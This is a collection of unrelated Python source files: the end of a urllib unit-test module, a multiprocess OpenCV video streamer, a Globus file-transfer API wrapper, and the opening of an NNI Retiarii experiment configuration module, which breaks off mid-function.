self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
# getproxies_environment() uses lowercased, truncated (no '_proxy') keys
self.assertEquals('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
result = urllib.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the docstring for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
The test cannot assume anything about order. The docs make no guarantee,
and dictionary input is possible.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of the password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work ok, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
ip_streamer.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 10 15:11:48 2020
@author: Nikki
"""
import cv2
import datetime
import sys
import multiprocessing as mp
import time
from ctypes import c_bool
#ip streams
#multiple video cap objects
#change detection to output to csv, save every 5 min or so
#make separate processes
#need to check that the grabbed frame exists and hasn't already been processed
def main():
ips = ['/home/worklab/Data/cv/video/AOTsample1_1.mp4']
m = mp.Manager()
updated = m.Value(c_bool, False)
frames = m.list([None] * len(ips))
times = m.list([None] * len(ips))
#lock = manager.Lock()
#start_lock = manager.Lock()
streamers = []
try:
for i, ip in enumerate(ips):
streamers.append(mp.Process(target=stream_all, args=(frames, times, ip, updated, i)))
for streamer in streamers:
streamer.start()
while updated.value == False:
continue
while True:
for i in range(len(ips)):
#cv2.namedWindow("result" + str(i), cv2.WINDOW_NORMAL)
cv2.imshow("result" + str(i), frames[i])
if cv2.waitKey(1) & 0xFF == ord('q'): break
except:
print('Unexpected error: ', sys.exc_info())
for streamer in streamers:
streamer.terminate()
cv2.destroyAllWindows()
def stream_all(frames, times, camera, updated, i):
#list of ip addresses to get video from
stream = open_cap(camera["address"] ) # frames = [None] * len(ips)
# times = [None] * len(ips)
print(frames[i])
print(times[i])
print(stream)
get_cap(stream, frames, times, i)
updated.value = True
try:
ret_val = True
while True:
ret_val = get_cap(stream, frames, times, i)
updated.value = True
# cv2.namedWindow("result" + str(i), cv2.WINDOW_NORMAL)
# cv2.imshow("result" + str(i), frames[i])
# if cv2.waitKey(1) & 0xFF == ord('q'): break
print("Finished all frames.")
close_cap(stream)
cv2.destroyAllWindows()
except:
print("Unexpected error:", sys.exc_info()[0])
close_cap(stream)
cv2.destroyAllWindows()
return
#opens video capture objects for all input streams
def open_cap(ip):
print("Video from: ", ip)
stream = cv2.VideoCapture(ip)
print ("Capture opened")
return stream
#gets the next frame from each video capture object
#at some point should read this directly into shared memory
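# One possible direction for that (sketch; assumes numpy imported as np and a
# known, fixed frame shape such as 1080x1920x3):
#     shared = mp.Array('B', 1080 * 1920 * 3, lock=False)
#     frame = np.frombuffer(shared, dtype=np.uint8).reshape(1080, 1920, 3)
#     stream.read(frame)  # VideoCapture.read() can fill a preallocated array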
def get_cap(stream, frames, times, i):
times[i] = datetime.datetime.now()
ret_val, frames[i] = stream.read()
return ret_val
#closes all video capture objects
def close_cap(stream):
stream.release()
print ("Captures closed")
if __name__ == "__main__":
main()
|
api.py
|
"""Interact with the Globus API. All endpoint connections happen here."""
import threading
import time
from globusonline.transfer import api_client
class GlobusAPI(object):
def __init__(self, local_endpoint, remote_endpoint):
"""Create a wrapper around the Globus API Client."""
# Get credentials.
auth_result = api_client.goauth.get_access_token()
self.api = api_client.TransferAPIClient(
username=auth_result.username, goauth=auth_result.token)
# Activate endpoints.
self.local_endpoint, self.remote_endpoint = local_endpoint, remote_endpoint
status, msg, data = self.api.endpoint_autoactivate(local_endpoint)
print data['message']
assert status == 200
status, msg, data = self.api.endpoint_autoactivate(remote_endpoint)
print data['message']
assert status == 200
# Setup asynchronous task queue.
self.task_queue = AsyncTaskQueue(self)
def Close(self):
"""Wait for pending changes and close out the API connection."""
self.task_queue.Finish()
self.api.close()
def SubmissionID(self):
"""Get a new submission id."""
status, msg, data= self.api.transfer_submission_id()
return data['value']
######################
# Blocking Requests #
######################
def CopyToLocal(self, remote_path, local_path, timeout_secs=10):
"""Copy a remote file into the local endpoint.
Args:
remote_path: Remote file path to copy.
local_path: Destination file path.
timeout: Maximum waiting time (in seconds) for file transfer to complete.
Returns:
True if the transfer was successful, False otherwise.
"""
# Copy the file over the network; block until successful or timeout.
print 'Copying {0} to local cache...'.format(remote_path)
task = api_client.Transfer(
self.SubmissionID(), self.remote_endpoint, self.local_endpoint)
task.add_item(remote_path, local_path)
status, msg, data = self.api.transfer(task)
task_id = data['task_id']
success = False
for _ in xrange(timeout_secs):
status, msg, data = self.api.task(task_id)
if data['completion_time']:
success = True
break
time.sleep(1)
return success
def EndpointList(self, path):
"""Return a list of file info dictionaries for the given path."""
print 'Loading directory %s from Globus...' % path
status, msg, data = self.api.endpoint_ls(self.remote_endpoint, path=path)
return data['DATA']
def Mkdir(self, path):
"""Make a directory on the remote endpoint."""
_, _, data = self.api.endpoint_mkdir(self.remote_endpoint, path)
print data['message']
########################
# Background Requests #
########################
def Delete(self, path):
"""Add a task to recursively delete the given path."""
self.task_queue.AddDeletion(self.remote_endpoint, path)
def Rename(self, old_path, new_path):
"""Move/Rename a file on the remote endpoint."""
self.task_queue.AddTransfer(self.remote_endpoint, old_path, self.remote_endpoint, new_path)
self.task_queue.AddDeletion(self.remote_endpoint, old_path)
class AsyncTaskQueue(object):
"""Asynchronous task queue. This allows us to batch related requests together.
For example, recursively removing a directory would make dozens of calls to api.Delete().
Rather than sending the requests individually, we batch them together here,
reducing network overhead and improving performance.
"""
def __init__(self, api):
# Store tasks as a list (queue).
# Each entry is a 2-tuple:
# descriptor tuple e.g. ('delete', 'go#ep1')
# Globus api_client task to submit
self.queue = []
self.api = api # GlobusAPI() wrapper (has access to SubmissionID)
self.direct_api = api.api # Underlying api object.
self.lock = threading.Lock()
self.last_change = time.time() # Time of last task submission.
self.closing = False # Flag to indicate when the process should close.
self.handler_thread = threading.Thread(target=self.HandleTasks)
self.handler_thread.start()
def Finish(self):
"""Wait until all pending changes have synced and the thread quits."""
self.closing = True
self.handler_thread.join()
def HandleTasks(self):
"""Async function: wake up every so often and process the pending tasks."""
while True:
# Copy the relevant tasks so the lock can be released.
if self.closing or time.time() - self.last_change > 3:
# We're closing or the last change was more than 3 seconds ago; push changes.
queue_copy = []
with self.lock:
# Copy relevant tasks into a separate queue so we can work on them.
queue_copy.extend(self.queue)
self.queue = []
# print 'Clearing task queue...'
pending_task_id = None
for descriptor, task in queue_copy:
if pending_task_id:
# We need to wait at least 30 secs for the last task to finish before
# submitting the next. The ordering of deletes/moves may be important.
for _ in xrange(30):
status, msg, data = self.direct_api.task(pending_task_id)
if data['completion_time']:
break
time.sleep(1)
if descriptor[0] == 'delete':
_, _, data = self.direct_api.delete(task)
pending_task_id = data['task_id']
print '\t' + data['message']
else: # Transfer
_, _, data = self.direct_api.transfer(task)
pending_task_id = data['task_id']
print '\t' + data['message']
if self.closing:
return
time.sleep(10)
def AddDeletion(self, endpoint, path):
descriptor = ('delete', endpoint)
with self.lock:
if self.queue and self.queue[-1][0] == descriptor:
self.queue[-1][1].add_item(path)
else:
task = api_client.Delete(self.api.SubmissionID(), endpoint, recursive=True)
task.add_item(path)
self.queue.append((descriptor, task))
self.last_change = time.time()
def AddTransfer(self, src_endpoint, src_path, dest_endpoint, dest_path):
descriptor = ('transfer', src_endpoint, dest_endpoint)
with self.lock:
if self.queue and self.queue[-1][0] == descriptor:
self.queue[-1][1].add_item(src_path, dest_path, recursive=True)
else:
task = api_client.Transfer(self.api.SubmissionID(), src_endpoint, dest_endpoint)
task.add_item(src_path, dest_path, recursive=True)
self.queue.append((descriptor, task))
self.last_change = time.time()
|
pytorch.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import os
import socket
import time
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.common.device import GPUDevice
from nni.experiment import Experiment, TrainingServiceConfig, launcher, management, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..converter.graph_gen import GraphConverterWithShape
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import extract_mutation_from_pt_module, process_inline_mutation
from ..oneshot.interface import BaseOneShotTrainer
from ..strategy import BaseStrategy
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
devices: Optional[List[Union[str, GPUDevice]]] = None
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
max_concurrency_cgo: Optional[int] = None
batch_waiting_time: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
# input used in GraphConverterWithShape. Currently support shape tuple only.
dummy_input: Optional[List[int]] = None
# input used for benchmark engine.
benchmark: Optional[str] = None
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform=training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo', 'benchmark'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True, dummy_input=None):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
if dummy_input is not None:
# FIXME: this is a workaround as full tensor is not supported in configs
dummy_input = torch.randn(*dummy_input)
converter = GraphConverterWithShape()
base_model_ir = convert_to_graph(script_module, base_model, converter, dummy_input=dummy_input)
else:
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
